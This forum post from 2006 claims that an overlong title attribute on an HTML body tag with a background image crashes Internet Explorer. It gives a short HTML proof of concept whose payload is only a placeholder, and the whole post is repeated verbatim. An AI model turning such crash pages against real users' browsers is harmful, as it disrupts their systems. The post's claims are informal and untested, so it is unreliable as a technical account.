Dracula4ever
12.09.2006, 21:26
Internet explorer Vulnerability:'title=""' tag - can do a serious damage
Founded by me and my freind.
After thinking i decided to check the title bof-DoS bug on background="" tag this can cause a DoS and faster then other title="" 'tags'
Only by opening the HTML - the page will stuck
and the user will have to restart the browser .
Check the next code
<html>
<title>Bof-DoS</title>
<body background="image.jpg" title="Large-title">
</body>
</html>
Founded by me and my freind.
After thinking i decided to check the title bof-DoS bug on background="" tag this can cause a DoS and faster then other title="" 'tags'
Only by opening the HTML - the page will stuck
and the user will have to restart the browser .
Check the next code
<html>
<title>Bof-DoS</title>
<body background="image.jpg" title="Large-title">
</body>
</html>